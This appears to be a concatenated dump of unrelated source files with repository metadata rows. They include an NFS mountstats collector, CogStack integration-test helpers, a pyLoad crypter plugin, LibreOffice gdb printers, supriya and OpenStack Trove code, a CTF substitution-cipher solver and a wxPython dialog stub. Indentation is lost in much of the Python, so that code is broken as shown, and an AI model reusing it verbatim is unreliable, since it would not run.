# proc.mountstats.bytes.normalread 1464196613 41494104 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.normalwrite 1464196613 10145341022 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.directread 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.directwrite 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.serverread 1464196613 8413526 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.serverwrite 1464196613 10145494716 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.readpages 1464196613 2157 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.writepages 1464196613 2477054 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
"""
import sys
import time
import hashlib
COLLECTION_INTERVAL = 10 # seconds
# BYTES_FIELDS is individual fields in the 'bytes: ' line
BYTES_FIELDS = ['normalread', 'normalwrite', 'directread', 'directwrite', 'serverread', 'serverwrite', 'readpages',
'writepages']
# KEY_METRICS contains the RPC call metrics we want specific data for
KEY_METRICS = ['GETATTR', 'ACCESS', 'READ', 'WRITE']
# OTHER_METRICS contains the other RPC call we will aggregate as 'OTHER'
OTHER_METRICS = ['SETATTR', 'LOOKUP', 'READLINK', 'CREATE', 'MKDIR', 'SYMLINK', 'MKNOD', 'REMOVE', 'RMDIR', 'RENAME',
'LINK', 'READDIR', 'READDIRPLUS', 'FSSTAT', 'FSINFO', 'PATHCONF', 'COMMIT']
# RPC_FIELDS is the individual metric fields on the RPC metric lines
RPC_FIELDS = ['ops', 'txs', 'timeouts', 'txbytes', 'rxbytes', 'qtime', 'rttime', 'totaltime']
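# Illustrative sketch of the input parsed by main(): a per-op line in
# /proc/self/mountstats looks roughly like
#
#   READ: 1570976 1570976 0 244313360 263929348 14216 1683992 2670792
#
# (numbers taken from the sample output above; the exact layout can vary by
# kernel). main() copies values[1:] onto RPC_FIELDS in the order listed above,
# i.e. ops, txs, timeouts, txbytes, rxbytes, qtime, rttime, totaltime.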
def main():
"""nfsstats main loop."""
try:
f_nfsstats = open("/proc/self/mountstats", "r")
except:
sys.exit(13)
while True:
device = None
f_nfsstats.seek(0)
ts = int(time.time())
rpc_metrics = {}
for line in f_nfsstats:
values = line.split(None)
if len(values) == 0:
continue
if len(values) >= 8 and values[0] == 'device':
if values[7] == 'nfs':
dupe = False
hostname, mount = values[1].split(':')
mountpoint = values[4]
mount = mount.rstrip("/")
device = hostname + mount + mountpoint
rpc_metrics[device] = {}
rpc_metrics[device]['other'] = dict((x, 0) for x in RPC_FIELDS)
rpc_metrics[device]['nfshost'] = hostname
rpc_metrics[device]['nfsvol'] = mount
rpc_metrics[device]['mounts'] = [mount]
for metric in KEY_METRICS:
rpc_metrics[device][metric] = dict((x, 0) for x in RPC_FIELDS)
            if device is None:
                continue
            if dupe:
                continue
field = values[0].rstrip(":")
# Use events as a deduping key for multiple mounts of the same volume
# ( If multiple subdirectories of the same volume are mounted to different places they
# will show up in mountstats, but will have duplicate data. )
if field == "events":
digester = hashlib.md5()
digester.update(line)
m = digester.digest()
rpc_metrics[device]['digest'] = m
if m in rpc_metrics:
                    # metrics already counted, mark as dupe and ignore
dupe = True
first_device = rpc_metrics[m]
rpc_metrics[first_device]['mounts'].append(mount)
rpc_metrics[device]['dupe'] = True
else:
rpc_metrics[m] = device
if field == "bytes":
rpc_metrics[device]['bytes'] = dict(
(BYTES_FIELDS[i], values[i + 1]) for i in range(0, len(BYTES_FIELDS)))
if field in KEY_METRICS:
for i in range(1, len(RPC_FIELDS) + 1):
metric = field
rpc_metrics[device][metric][RPC_FIELDS[i - 1]] += int(values[i])
if field in OTHER_METRICS:
for i in range(1, len(RPC_FIELDS) + 1):
rpc_metrics[device]['other'][RPC_FIELDS[i - 1]] += int(values[i])
for device in rpc_metrics:
# Skip the duplicates
if 'dupe' in rpc_metrics[device]:
continue
            # Skip the digest-only entries (they won't have a reference to the digest)
if 'digest' not in rpc_metrics[device]:
continue
nfshost = rpc_metrics[device]['nfshost']
rpc_metrics[device]['mounts'].sort()
nfsvol = rpc_metrics[device]['mounts'][0]
for metric in KEY_METRICS + ['other']:
for field in rpc_metrics[device][metric]:
print("proc.mountstats.%s.%s %d %s nfshost=%s nfsvol=%s" % (metric.lower(), field.lower(), ts, rpc_metrics[device][metric][field], nfshost, nfsvol))
for field in BYTES_FIELDS:
print("proc.mountstats.bytes.%s %d %s nfshost=%s nfsvol=%s" % (field.lower(), ts, rpc_metrics[device]['bytes'][field], nfshost, nfsvol))
sys.stdout.flush()
time.sleep(COLLECTION_INTERVAL)
if __name__ == "__main__":
main()
| lgpl-3.0 | -7,301,741,734,256,473,000 | 57.376963 | 168 | 0.688969 | false |
CogStack/cogstack | test/examples/examples_common.py | 1 | 13905 | #!/usr/bin/python
import unittest
import os
import logging
import subprocess
import time
import yaml
from connectors import *
class TestSingleExample(unittest.TestCase):
"""
A common base class for the examples test cases
"""
def __init__(self,
example_path,
sub_case="",
use_local_image_build=True,
image_build_rel_dir="../../../",
*args, **kwargs):
"""
        :param example_path: the absolute path to the example's main directory
:param sub_case: the specific sub case to test
        :param use_local_image_build: whether to use a locally built CogStack Pipeline image
:param image_build_rel_dir: the relative directory where the image Dockerfile is located
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExample, self).__init__(*args, **kwargs)
# set paths and directories info
self.example_path = example_path
self.sub_case = sub_case
self.deploy_dir = '__deploy'
self.use_local_image_build = use_local_image_build
self.image_build_rel_dir = image_build_rel_dir
self.deploy_path = os.path.join(self.example_path, self.deploy_dir)
if len(self.sub_case) > 0:
self.deploy_path = os.path.join(self.deploy_path, self.sub_case)
self.image_build_rel_dir += "../"
# set commands
self.setup_cmd = 'bash setup.sh'
self.docker_cmd_up = 'docker-compose up -d' # --detach
self.docker_cmd_down = 'docker-compose down -v' # --volumes
# set up logger
log_format = '[%(asctime)s] [%(levelname)s] %(name)s: %(message)s'
logging.basicConfig(format=log_format, level=logging.INFO)
self.log = logging.getLogger(self.__class__.__name__)
@staticmethod
def getRecordsCountFromTargetDb(connector, table_name):
"""
Queries the table for the number of records
in the database specified by the connector
:param connector: the database connector :class:~JdbcConnector
:param table_name: the name of the table to query
:return: the number of records
"""
cursor = connector.cursor()
cursor.execute("SELECT COUNT(*) FROM %s" % table_name)
res = cursor.fetchall()
# res is a list of tuples
return int(res[0][0])
@staticmethod
def getRecordsCountFromTargetEs(connector, index_name):
"""
Queries the index for the number of documents (_count)
:param connector: the ElasticSearch connector :class:~ElasticSearchConnector
:param index_name: the name of the index to query
:return: the number of records
"""
res = connector.count(index_name)
return int(res['count'])
@staticmethod
def waitForTargetEsReady(connector, index_name, max_timeout_s=300):
"""
        Queries the index for the number of documents until no new ones arrive
:param connector: the ElasticSearch connector :class:~ElasticSearchConnector
:param index_name: the name of the index to query
:param max_timeout_s: maximum timeout [in s]
"""
start_time_s = time.time()
query_delay_s = 3
# wait for index
while True:
try:
index_exists = connector.indices.exists(index=index_name)
if index_exists or int(time.time() - start_time_s) > max_timeout_s:
break
except Exception as e:
logging.warn('Exception while querying index: %s' % e)
pass
time.sleep(query_delay_s)
min_count_wo_changes = 3
cur_count_wo_changes = 0
last_records_count = 0
# wait for documents
while cur_count_wo_changes < min_count_wo_changes:
recs = TestSingleExample.getRecordsCountFromTargetEs(connector, index_name)
if recs > 0:
if recs == last_records_count:
cur_count_wo_changes += 1
else:
last_records_count = recs
cur_count_wo_changes = 0
if cur_count_wo_changes > min_count_wo_changes or int(time.time() - start_time_s) > max_timeout_s:
break
time.sleep(query_delay_s)
@staticmethod
def waitForTargetDbReady(connector, table_name, max_timeout_s=300):
"""
        Queries the table for the number of records until no new ones arrive
:param connector: the JDBC connector :class:~JdbcConnector
:param table_name: the name of the table to query
:param max_timeout_s: maximum timeout [in s]
"""
start_time_s = time.time()
query_delay_s = 3
min_count_wo_changes = 3
cur_count_wo_changes = 0
last_records_count = 0
# wait for records
while cur_count_wo_changes < min_count_wo_changes:
recs = TestSingleExample.getRecordsCountFromTargetDb(connector, table_name)
if recs > 0:
if recs == last_records_count:
cur_count_wo_changes += 1
else:
last_records_count = recs
cur_count_wo_changes = 0
if cur_count_wo_changes > min_count_wo_changes or int(time.time() - start_time_s) > max_timeout_s:
break
time.sleep(query_delay_s)
def addBuildContextInComposeFile(self):
"""
        Add the build context key to the Docker Compose file
        so that a locally built image is used
"""
compose_file = os.path.join(self.deploy_path, "docker-compose.override.yml")
with open(compose_file, 'r') as c_file:
compose_yaml = yaml.safe_load(c_file)
# check whether the service key exists and add the build context
if 'cogstack-pipeline' not in compose_yaml['services']:
compose_yaml['services']['cogstack-pipeline'] = dict()
compose_yaml['services']['cogstack-pipeline']['build'] = self.image_build_rel_dir
# save the file in-place
with open(compose_file, 'w') as c_file:
yaml.dump(compose_yaml, c_file, default_flow_style=False)
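    # Minimal sketch of what addBuildContextInComposeFile() leaves behind in
    # docker-compose.override.yml, assuming the default image_build_rel_dir of
    # "../../../" (the service name comes from the code above, everything else
    # is illustrative):
    #
    #   services:
    #     cogstack-pipeline:
    #       build: ../../../
    #
    # With the build context in place, docker-compose builds the image locally
    # instead of pulling a published one.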
def setUp(self):
"""
Runs test case set up function
"""
# run setup for the example
self.log.info("Setting up ...")
try:
out = subprocess.check_output(self.setup_cmd, cwd=self.example_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.error("Failed to setup example: %s" % e)
if hasattr(e, 'output'):
self.log.error("Output: %s" % e.output)
self.fail(e.message)
        # replace the image with a local build
if self.use_local_image_build:
try:
self.addBuildContextInComposeFile()
except Exception as e:
self.log.error("Failed to add the local build context: %s" % e)
self.fail(e.message)
# run docker-compose
self.log.info("Starting the services ...")
try:
out = subprocess.check_output(self.docker_cmd_up, cwd=self.deploy_path, stderr=subprocess.STDOUT, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
# clean up
try:
out = subprocess.check_output(self.docker_cmd_down, stderr=subprocess.STDOUT, cwd=self.deploy_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as ee:
self.log.warn("Failed to stop services: %s" % ee)
self.log.error("Failed to start services: %s" % e)
self.fail(e.message)
    def tearDown(self):
        """
Runs test case tear down function
"""
# run docker-compose
self.log.info("Stopping the services ...")
try:
out = subprocess.check_output(self.docker_cmd_down, cwd=self.deploy_path, stderr=subprocess.STDOUT, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.warn("Failed to stop services: %s " % e)
# clean up the directory
self.log.info("Cleaning up ...")
main_deploy_path = os.path.join(self.example_path, self.deploy_dir)
try:
out = subprocess.check_output('rm -rf %s' % main_deploy_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.warn("Failed to clean up: %s" % e)
class TestSingleExampleDb2Es(TestSingleExample):
"""
A common base class for examples reading the records from a single database source
and storing them in ElasticSearch sink
"""
def __init__(self, source_conn_conf, source_table_name, es_conn_conf, es_index_name,
wait_for_source_ready_s=10,
wait_for_sink_ready_max_s=600,
*args, **kwargs):
"""
:param source_conn_conf: the source JDBC connector configuration :class:~JdbcConnectorConfig
:param source_table_name: the source database table name
:param es_conn_conf: the sink ElasticSearch connector configuration :class:~ElasticConnectorConfig
:param es_index_name: the sink ElasticSearch index name
:param wait_for_source_ready_s: delay [in s] to wait until source is ready to query
        :param wait_for_sink_ready_max_s: maximum delay [in s] to wait until the sink (and data) becomes ready to query
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExampleDb2Es, self).__init__(*args, **kwargs)
self.source_conn_conf = source_conn_conf
self.source_table_name = source_table_name
self.es_conn_conf = es_conn_conf
self.es_index_name = es_index_name
        self.wait_for_source_ready_s = wait_for_source_ready_s
self.wait_for_sink_ready_max_s = wait_for_sink_ready_max_s
    def test_source_sink_mapping(self):
        """
Runs a simple test verifying the number of records in the source and the sink
"""
# wait here until DBs become ready
self.log.info("Waiting for source/sink to become ready ...")
        time.sleep(self.wait_for_source_ready_s)
source_conn = JdbcConnector(self.source_conn_conf)
es_conn = ElasticConnector(self.es_conn_conf)
# wait here until ES becomes ready
self.log.info("Waiting for cogstack pipeline to process records ...")
#time.sleep(self.wait_for_sink_ready_max_s)
self.waitForTargetEsReady(es_conn.connector, self.es_index_name, self.wait_for_sink_ready_max_s)
recs_in = self.getRecordsCountFromTargetDb(source_conn.connector, self.source_table_name)
recs_out = self.getRecordsCountFromTargetEs(es_conn.connector, self.es_index_name)
        self.assertEqual(recs_in, recs_out, "Record counts differ between source (%s) and sink (%s)." % (recs_in, recs_out))
class TestSingleExampleDb2Db(TestSingleExample):
"""
A common base class for examples reading the records from a single database source
and storing them in the same or another database sink
"""
def __init__(self, source_conn_conf, source_table_name, sink_conn_conf, sink_table_name,
wait_for_source_ready_s=10,
wait_for_sink_ready_max_s=600,
*args, **kwargs):
"""
:param source_conn_conf: the source JDBC connector configuration :class:~JdbcConnectorConfig
:param source_table_name: the source database table name
:param sink_conn_conf: the sink JDBC connector configuration :class:~JdbcConnectorConfig
:param sink_table_name: the sink database table name
:param wait_for_source_ready_s: delay [in s] to wait until source is ready to query
        :param wait_for_sink_ready_max_s: maximum delay [in s] to wait until the sink (and data) becomes ready to query
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExampleDb2Db, self).__init__(*args, **kwargs)
self.source_conn_conf = source_conn_conf
self.source_table_name = source_table_name
self.sink_conn_conf = sink_conn_conf
self.sink_table_name = sink_table_name
        self.wait_for_source_ready_s = wait_for_source_ready_s
self.wait_for_sink_ready_max_s = wait_for_sink_ready_max_s
    def test_source_sink_mapping(self):
        """
Runs a simple test verifying the number of records in the source and the sink
"""
# wait here until DBs become ready
self.log.info("Waiting for source/sink to become ready ...")
        time.sleep(self.wait_for_source_ready_s)
source_conn = JdbcConnector(self.source_conn_conf)
sink_conn = JdbcConnector(self.sink_conn_conf)
# wait here until sink becomes ready
self.log.info("Waiting for cogstack pipeline to process records ...")
self.waitForTargetDbReady(sink_conn.connector, self.sink_table_name, self.wait_for_sink_ready_max_s)
recs_in = self.getRecordsCountFromTargetDb(source_conn.connector, self.source_table_name)
recs_out = self.getRecordsCountFromTargetDb(sink_conn.connector, self.sink_table_name)
        self.assertEqual(recs_in, recs_out, "Record counts differ between source (%s) and sink (%s)." % (recs_in, recs_out))
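# Illustrative sketch of how a concrete example test could reuse the classes
# above. The JdbcConnectorConfig / ElasticConnectorConfig constructor
# arguments are assumptions -- the real signatures live in the 'connectors'
# module imported at the top and may differ.
#
#   class ExampleDb2EsTestCase(TestSingleExampleDb2Es):
#       def __init__(self, *args, **kwargs):
#           kwargs.update(
#               source_conn_conf=source_conf,        # a JdbcConnectorConfig
#               source_table_name='medical_reports',
#               es_conn_conf=es_conf,                # an ElasticConnectorConfig
#               es_index_name='medical_reports_text',
#               example_path='/path/to/examples/example2')
#           super(ExampleDb2EsTestCase, self).__init__(*args, **kwargs)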
| apache-2.0 | 2,910,151,856,740,945,400 | 40.88253 | 127 | 0.611363 | false |
rlindner81/pyload | module/plugins/crypter/FreakhareComFolder.py | 1 | 1784 | # -*- coding: utf-8 -*-
import re
from module.plugins.internal.SimpleCrypter import SimpleCrypter
class FreakhareComFolder(SimpleCrypter):
__name__ = "FreakhareComFolder"
__type__ = "crypter"
__version__ = "0.08"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?freakshare\.com/folder/.+'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("folder_per_package", "Default;Yes;No",
"Create folder for each package", "Default"),
("max_wait", "int", "Reconnect if waiting time is greater than minutes", 10)]
__description__ = """Freakhare.com folder decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("stickell", "[email protected]")]
LINK_PATTERN = r'<a href="(http://freakshare\.com/files/.+?)" target="_blank">'
NAME_PATTERN = r'Folder:</b> (?P<N>.+)'
PAGES_PATTERN = r'Pages: +(\d+)'
def load_page(self, page_n):
if not hasattr(self, 'f_id') and not hasattr(self, 'f_md5'):
m = re.search(
r'http://freakshare.com/\?x=folder&f_id=(\d+)&f_md5=(\w+)',
self.data)
if m is not None:
self.f_id = m.group(1)
self.f_md5 = m.group(2)
return self.load('http://freakshare.com/', get={'x': 'folder',
'f_id': self.f_id,
'f_md5': self.f_md5,
'entrys': '20',
'page': page_n - 1,
'order': ''})
| gpl-3.0 | 5,220,101,632,335,312,000 | 41.47619 | 95 | 0.453475 | false |
beppec56/core | solenv/gdb/libreoffice/writerfilter.py | 5 | 2749 | # -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-
#
# This file is part of the LibreOffice project.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
from libreoffice.util import printing
class OOXMLPropertySetPrinter(object):
'''Prints writerfilter::ooxml::OOXMLPropertySet'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
def children(self):
children = [ ( 'properties', self.value['mProperties'] ) ]
return children.__iter__()
class OOXMLPropertyPrinter(object):
'''Prints writerfilter::ooxml::OOXMLProperty'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
def children(self):
children = [ ( 'id', self.value['mId'] ),
( 'type', self.value['meType'] ),
( 'value', self.value['mpValue'] ) ]
return children.__iter__()
class OOXMLPropertySetValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLPropertySetValue'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
class OOXMLStringValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLStringValue'''
def __init__(self, typename, value):
self.value = value
def to_string(self):
return "%s" % (self.value['mStr'])
class OOXMLIntegerValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLIntegerValue'''
def __init__(self, typename, value):
self.value = value
def to_string(self):
return "%d" % (self.value['mnValue'])
printer = None
def build_pretty_printers():
global printer
printer = printing.Printer("libreoffice/writerfilter")
printer.add('writerfilter::ooxml::OOXMLProperty', OOXMLPropertyPrinter)
printer.add('writerfilter::ooxml::OOXMLPropertySet', OOXMLPropertySetPrinter)
printer.add('writerfilter::ooxml::OOXMLPropertySetValue', OOXMLPropertySetValuePrinter)
printer.add('writerfilter::ooxml::OOXMLStringValue', OOXMLStringValuePrinter)
printer.add('writerfilter::ooxml::OOXMLIntegerValue', OOXMLIntegerValuePrinter)
printer.add('writerfilter::ooxml::OOXMLHexValue', OOXMLIntegerValuePrinter)
def register_pretty_printers(obj):
printing.register_pretty_printer(printer, obj)
build_pretty_printers()
# vim:set shiftwidth=4 softtabstop=4 expandtab:
| gpl-3.0 | 8,452,466,231,903,170,000 | 30.238636 | 91 | 0.666788 | false |
Pulgama/supriya | supriya/commands/SynthDefLoadDirectoryRequest.py | 1 | 1591 | import pathlib
import supriya.osc
from supriya.commands.Request import Request
from supriya.commands.RequestBundle import RequestBundle
from supriya.enums import RequestId
class SynthDefLoadDirectoryRequest(Request):
"""
A /d_loadDir request.
"""
### CLASS VARIABLES ###
__slots__ = ("_callback", "_directory_path")
request_id = RequestId.SYNTHDEF_LOAD_DIR
### INITIALIZER ###
def __init__(self, callback=None, directory_path=None):
Request.__init__(self)
if callback is not None:
assert isinstance(callback, (Request, RequestBundle))
self._callback = callback
self._directory_path = pathlib.Path(directory_path).absolute()
### PUBLIC METHODS ###
def to_osc(self, *, with_placeholders=False, with_request_name=False):
if with_request_name:
request_id = self.request_name
else:
request_id = int(self.request_id)
contents = [request_id, str(self.directory_path)]
if self.callback:
contents.append(
self.callback.to_osc(
with_placeholders=with_placeholders,
with_request_name=with_request_name,
)
)
message = supriya.osc.OscMessage(*contents)
return message
### PUBLIC PROPERTIES ###
@property
def callback(self):
return self._callback
@property
def response_patterns(self):
return ["/done", "/d_loadDir"], None
@property
def directory_path(self):
return self._directory_path
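    # Minimal usage sketch (not exercised in this module); the path is an
    # illustrative placeholder and the exact OSC payload depends on supriya's
    # OscMessage formatting:
    #
    #   request = SynthDefLoadDirectoryRequest(directory_path='/tmp/synthdefs')
    #   message = request.to_osc(with_request_name=True)
    #   # roughly OscMessage('/d_loadDir', '/tmp/synthdefs')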
| mit | 4,937,795,839,363,454,000 | 25.966102 | 74 | 0.607165 | false |
openstack/trove | trove/common/strategies/cluster/experimental/galera_common/api.py | 1 | 8545 | # Copyright [2015] Hewlett-Packard Development Company, L.P.
# Copyright 2016 Tesora Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_log import log as logging
import time
from trove.cluster import models as cluster_models
from trove.cluster.tasks import ClusterTasks
from trove.cluster.views import ClusterView
from trove.common import cfg
from trove.common import exception
from trove.common import server_group as srv_grp
from trove.common.strategies.cluster import base as cluster_base
from trove.extensions.mgmt.clusters.views import MgmtClusterView
from trove.instance.models import DBInstance
from trove.instance.models import Instance
from trove.quota.quota import check_quotas
from trove.taskmanager import api as task_api
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class GaleraCommonAPIStrategy(cluster_base.BaseAPIStrategy):
@property
def cluster_class(self):
return GaleraCommonCluster
@property
def cluster_view_class(self):
return GaleraCommonClusterView
@property
def mgmt_cluster_view_class(self):
return GaleraCommonMgmtClusterView
class GaleraCommonCluster(cluster_models.Cluster):
@staticmethod
def _validate_cluster_instances(context, instances, datastore,
datastore_version):
"""Validate the flavor and volume"""
ds_conf = CONF.get(datastore_version.manager)
num_instances = len(instances)
# Checking volumes and get delta for quota check
cluster_models.validate_instance_flavors(
context, instances, ds_conf.volume_support, ds_conf.device_path)
req_volume_size = cluster_models.get_required_volume_size(
instances, ds_conf.volume_support)
cluster_models.assert_homogeneous_cluster(instances)
deltas = {'instances': num_instances, 'volumes': req_volume_size}
# quota check
check_quotas(context.project_id, deltas)
        # Check that the networks are the same for the cluster
cluster_models.validate_instance_nics(context, instances)
@staticmethod
def _create_instances(context, db_info, datastore, datastore_version,
instances, extended_properties, locality,
configuration_id):
member_config = {"id": db_info.id,
"instance_type": "member"}
name_index = int(time.time())
for instance in instances:
if not instance.get("name"):
instance['name'] = "%s-member-%s" % (db_info.name,
str(name_index))
name_index += 1
return [Instance.create(context,
instance['name'],
instance['flavor_id'],
datastore_version.image_id,
[], [],
datastore, datastore_version,
instance.get('volume_size', None),
None,
availability_zone=instance.get(
'availability_zone', None),
nics=instance.get('nics', None),
configuration_id=configuration_id,
cluster_config=member_config,
volume_type=instance.get(
'volume_type', None),
modules=instance.get('modules'),
locality=locality,
region_name=instance.get('region_name')
)
for instance in instances]
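    # Minimal sketch of the per-instance dicts consumed by _create_instances()
    # above; only keys the method actually reads are listed and every value is
    # an illustrative placeholder:
    #
    #   instances = [{'name': 'galera-member-1',  # optional, generated if absent
    #                 'flavor_id': '7',
    #                 'volume_size': 2,
    #                 'volume_type': None,
    #                 'availability_zone': None,
    #                 'nics': None,
    #                 'modules': None,
    #                 'region_name': None}]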
@classmethod
def create(cls, context, name, datastore, datastore_version,
instances, extended_properties, locality, configuration):
LOG.debug("Initiating Galera cluster creation.")
ds_conf = CONF.get(datastore_version.manager)
# Check number of instances is at least min_cluster_member_count
if len(instances) < ds_conf.min_cluster_member_count:
raise exception.ClusterNumInstancesNotLargeEnough(
num_instances=ds_conf.min_cluster_member_count)
cls._validate_cluster_instances(context, instances, datastore,
datastore_version)
# Updating Cluster Task
db_info = cluster_models.DBCluster.create(
name=name, tenant_id=context.project_id,
datastore_version_id=datastore_version.id,
task_status=ClusterTasks.BUILDING_INITIAL,
configuration_id=configuration)
cls._create_instances(context, db_info, datastore, datastore_version,
instances, extended_properties, locality,
configuration)
        # Call the taskmanager to proceed with the cluster configuration
task_api.load(context, datastore_version.manager).create_cluster(
db_info.id)
return cls(context, db_info, datastore, datastore_version)
def grow(self, instances):
LOG.debug("Growing cluster %s.", self.id)
self.validate_cluster_available()
context = self.context
db_info = self.db_info
datastore = self.ds
datastore_version = self.ds_version
self._validate_cluster_instances(context, instances, datastore,
datastore_version)
db_info.update(task_status=ClusterTasks.GROWING_CLUSTER)
try:
locality = srv_grp.ServerGroup.convert_to_hint(self.server_group)
configuration_id = self.db_info.configuration_id
new_instances = self._create_instances(
context, db_info, datastore, datastore_version, instances,
None, locality, configuration_id)
task_api.load(context, datastore_version.manager).grow_cluster(
db_info.id, [instance.id for instance in new_instances])
except Exception:
db_info.update(task_status=ClusterTasks.NONE)
raise
return self.__class__(context, db_info,
datastore, datastore_version)
def shrink(self, instances):
"""Removes instances from a cluster."""
LOG.debug("Shrinking cluster %s.", self.id)
self.validate_cluster_available()
removal_instances = [Instance.load(self.context, inst_id)
for inst_id in instances]
db_instances = DBInstance.find_all(
cluster_id=self.db_info.id, deleted=False).all()
if len(db_instances) - len(removal_instances) < 1:
raise exception.ClusterShrinkMustNotLeaveClusterEmpty()
self.db_info.update(task_status=ClusterTasks.SHRINKING_CLUSTER)
try:
task_api.load(self.context, self.ds_version.manager
).shrink_cluster(self.db_info.id,
[instance.id
for instance in removal_instances])
except Exception:
self.db_info.update(task_status=ClusterTasks.NONE)
raise
return self.__class__(self.context, self.db_info,
self.ds, self.ds_version)
def restart(self):
self.rolling_restart()
def upgrade(self, datastore_version):
self.rolling_upgrade(datastore_version)
def configuration_attach(self, configuration_id):
self.rolling_configuration_update(configuration_id)
def configuration_detach(self):
self.rolling_configuration_remove()
class GaleraCommonClusterView(ClusterView):
def build_instances(self):
return self._build_instances(['member'], ['member'])
class GaleraCommonMgmtClusterView(MgmtClusterView):
def build_instances(self):
return self._build_instances(['member'], ['member'])
| apache-2.0 | 6,938,992,577,265,040,000 | 38.37788 | 79 | 0.604447 | false |
chenyoufu/writeups | jarvisoj/basic_cake.py | 1 | 1448 | s = '''
nit yqmg mqrqn bxw mtjtm nq rqni fiklvbxu mqrqnl xwg dvmnzxu lqjnyxmt xatwnl, rzn nit uxnntm xmt zlzxuuk mtjtmmtg nq xl rqnl. nitmt vl wq bqwltwlzl qw yivbi exbivwtl pzxuvjk xl mqrqnl rzn nitmt vl atwtmxu xamttetwn xeqwa tsftmnl, xwg nit fzruvb, nixn mqrqnl ntwg nq gq lqet qm xuu qj nit jquuqyvwa: xbbtfn tutbnmqwvb fmqamxeevwa, fmqbtll gxnx qm fiklvbxu ftmbtfnvqwl tutbnmqwvbxuuk, qftmxnt xznqwqeqzluk nq lqet gtamtt, eqdt xmqzwg, qftmxnt fiklvbxu fxmnl qj vnltuj qm fiklvbxu fmqbtlltl, ltwlt xwg exwvfzuxnt nitvm twdvmqwetwn, xwg tsivrvn vwntuuvatwn rtixdvqm - tlftbvxuuk rtixdvqm yivbi evevbl izexwl qm qnitm xwvexul. juxa vl lzrlnvnzntfxllvldtmktxlkkqzaqnvn. buqltuk mtuxntg nq nit bqwbtfn qj x mqrqn vl nit jvtug qj lkwnitnvb rvquqak, yivbi lnzgvtl twnvnvtl yiqlt wxnzmt vl eqmt bqefxmxrut nq rtvwal nixw nq exbivwtl.
'''
print [x for x in s.split(' ') if len(x) == 1]
print [x for x in s.split(' ') if len(x) == 2]
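# The two prints above list the one- and two-letter cipher words; in English
# those are almost always 'a'/'i' and words like 'of', 'to', 'is', 'in', which
# pins down the first few substitutions in the mapping below. The remaining
# letters follow from frequency analysis and partially decoded words.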
m = {
'a': 'g',
'b': 'c',
'd': 'v',
'e': 'm',
'f': 'p',
'x': 'a',
'r': 'b',
's': 'x',
'z': 'u',
'g': 'd',
'y': 'w',
'j': 'f',
'u': 'l',
'k': 'y',
'w': 'n',
'q': 'o',
'v': 'i',
'l': 's',
'n': 't',
'i': 'h',
't': 'e',
'm': 'r'
}
ss = ''
for x in s:
if x in m.keys():
ss += m[x]
else:
ss += x
print ss
flag = 'lzrlnvnzntfxllvldtmktxlkkqzaqnvn'
for f in flag:
if f not in m.keys():
print f
| gpl-3.0 | -6,093,663,068,113,639,000 | 29.166667 | 823 | 0.608425 | false |
swprojects/Serial-Sequence-Creator | dialogs/setvoltage.py | 1 | 5066 | """
Description:
Requirements: pySerial, wxPython Phoenix
    glossary and other descriptions:
DMM - digital multimeter
PSU - power supply
SBC - single board computer
INS - general instrument commands
GEN - general sequence instructions
"""
import logging
import sys
import time
import wx
import theme
import base
class SetVoltage(wx.Dialog):
def __init__(self, parent, instruments):
wx.Dialog.__init__(self,
parent,
title="Set Voltage")
panel = wx.Panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
hsizer = wx.BoxSizer(wx.HORIZONTAL)
sbox = wx.StaticBox(panel, label="")
sbox_sizer = wx.StaticBoxSizer(sbox, wx.HORIZONTAL)
grid = wx.GridBagSizer(5,5)
row = 0
# row += 1 #let's start at 1, to give some space
lbl_psu = wx.StaticText(panel, label="Power Supply:")
choices = ["Choose on execution"]
choices.extend(instruments)
self.cbox_psu = wx.ComboBox(panel, choices=choices)
# self.cbox_psu.Bind(wx.EVT_COMBOBOX, self.OnPsuSelected)
